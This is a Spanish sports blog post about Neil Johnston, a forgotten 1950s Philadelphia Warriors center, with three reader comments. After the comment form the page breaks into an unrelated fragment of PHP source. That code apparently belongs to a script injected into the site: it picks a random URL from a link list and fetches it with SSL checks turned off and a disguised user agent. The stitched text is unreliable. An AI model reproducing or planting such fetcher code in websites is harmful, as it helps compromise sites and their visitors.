¿Quién fue Neil Johnston?

10 de September de 2012 por txusma

Si alguien es capaz de decirme de qué época es Neil Johnston y en qué equipo jugó toda su carrera le nombro ahora mismo máximo conocedor mundial de la NBA. Creo que hablamos de un auténtico desconocido para el gran (y el pequeño) público, algo que puede parecer extraño ya que se trata de un jugador que fue All-Star 6 años consecutivos, apareció en 4 quintetos de la temporada, fue el máximo anotador de la liga en 3 ocasiones y, como colofón a su brillante carrera, posee un anillo de campeón y es miembro del Hall of Fame.  Muchos jugadores de los que hoy consideramos estrellas matarían por un palmarés similar.

Alguno podría apuntar que no posee ningún MVP pero eso simplemente es porque este premio se empezó a otorgar a mitad de su carrera y porque tuvo la “desgracia” de coincidir en el tiempo con monstruos de la talla de Bob Cousy, Bob Pettit o un joven Bill Russell. Con estas pistas seguro que ya estáis todos situados temporalmente. 

Neil Johnston fue un pívot de 2’03 metros de altura que jugó toda su carrera en los Philadelphia Warriors, aunque no fueron ellos los que lo draftearon. De hecho, ningún equipo lo drafteó, ya que Johnston, tras su paso por la universidad, fichó por los Philadelphia Phillies de la Major League Baseball, en los que jugó un par de años como pitcher con más pena que gloria. En verano de 1951 dio carpetazo al béisbol y fichó por los Philadelphia Warriors de Paul Arizin y Joe Fulks.

En su primer año apenas jugó 15 minutos por partido y promedió 6 puntos en un juego ofensivo totalmente centrado en Arizin y Fulks.  A la temporada siguiente, la llamada a filas de Paul Arizin (que se pasó dos años en la marina) y el declive de Joe Fulks le llevaron a protagonizar uno de los mayores incrementos en minutaje de una temporada a otra de la historia. De los 15 minutos de su primer año pasó a disputar 45. Evidentemente sus medias se incrementaron y aquel año llegó a los 22,3 puntos y 13,9 rebotes por partido. Fue el máximo anotador de la liga (en parte gracias a un gancho de derechas prácticamente infalible), jugó el All-Star Game y fue incluido en el mejor quinteto de la temporada. 5 las 6 mejores marcas anotadoras de la temporada fueron obra suya. Era la primera de una serie de temporadas de leyenda.

A pesar de los esfuerzos de su pívot titular, los Warriors fueron un equipo de la parte baja de la clasificación durante dos temporadas, y es que el jugador de Ohio era el único que daba el nivel mínimo exigido en la plantilla. No fue hasta el retorno de Arizin que el equipo empezó a remontar el vuelo de la mano de una de las mejores parejas de todos los tiempos.

En el primer año tras el reencuentro, los Warriors se acercaron al 50% de victorias y asentaron las bases de un equipo ganador. Junto a Johnston y Arizin, que se compenetraban a la perfección, destacaron el base Jack George y el ala-pívot Joe Graboski. A pesar de estar rodeado de más talento, los número de Johnston se mantuvieron e incluso mejoraron en el apartado reboteador. Llegó a los 15 rebotes por partido, cifra que le valió para convertirse en el máximo reboteador del campeonato. Al año siguiente, en la temporada 1955-1956, la llegada del rookie Tom Gola acabó de afianzar el quinteto titular y de la mano de un Paul Arizin desatado y un Neil Johnston soberbio (22 puntos y 12’5 rebotes de media), los Warriors consiguieron el primero de sus dos únicos anillos en la NBA.

En la temporada 1956-57 cayeron en la primera ronda de unos playoffs que a la postre coronarían a los Celtics de Bill Russell, Bob Cousy y Bill Sharman. Precisamente los Celtics les apearían al año siguiente en las finales de la conferencia Este. A pesar de las buenas actuaciones de Paul Arizin (23 puntos y 7’5 rebotes por partido) y de Neil Johnston (21 puntos y 11’6 rebotes por partido) aquellas temporadas, el equipo presentaba signos de desgaste y se veía necesaria una ligera reconstrucción. Desgraciadamente, un fatídico accidente dio al traste con cualquier plan. Neil se lesionó gravemente la rodilla durante un partido de exhibición al chocar contra una pared. Los médicos no tenían claro si podría volver a jugar aquella temporada y si podría recuperar alguna vez el nivel que había mantenido hasta el momento. Tenían razón. Aquel año llegó a debutar y jugó 28 partidos pero la lesión de rodilla había afectado gravemente a su movilidad y tan solo fue capaz de anotar 6 puntos por partido. Al término de aquella temporada, a la edad de 29 años, decidió retirarse.

Al año siguiente llegaría al equipo un tal Wilt Chamberlain y jugando al juego del “y que habría pasado si…” podríamos llegar a la conclusión que los Boston Celtics lo habrían tenido mucho más difícil ante unos Warriors con Arizin, Johnston y Chamberlain en el equipo.

Es curioso como un jugador como Neil Johnston puede caer en el olvido. Posiblemente, el hecho de que jugara en una época sin grandes pívots entre los años de George Mikan y los de Bill Russell/Will Chamberlain juegue en su contra. De todas maneras, es justo recordar que él es uno de los seis jugadores de la historia (junto a Jordan, Gervin, Mikan, Chamberlain y McAdoo) capaces de ganar el título de máximo anotador tres temporadas seguidas y que, junto a Kareem Abdul-Jabbar y Wilt Chamberlain, ha sido el único jugador capaz en liderar la liga el mismo año en puntos, rebotes y % de acierto en tiros de campo.

Como dijo Al Cervi, su entrenador en la temporada de su retirada: “Él es mejor con una sola pierna que la mayoría del resto de jugadores de la liga”.

Comenta

3 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Impresionante… el caso es que me sonaba bastante. Había leído alguna cosilla aquí y allá pero no profundicé lo suficiente.

    Siento el chascarrillo, pero… tiene un punto muy “Fran Vazquez” ¿no?? XD XD XD

      Citar

  2. Nacho dice:
    #2

    Una forma cualquiera de decir que es más feo que mis…
    Yo Tampoco lo conocía. Gracias por este acercamiento.

      Citar

  3. GreenPride dice:
    #3

    Tengo que reconocer que no había oído hablar de él nunca. Pero sus estadísticas hacen ver que era un grande, como dice el artículo muchos matarían por su palmarés. Gracias por acercarnos a esta desconocida figura

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>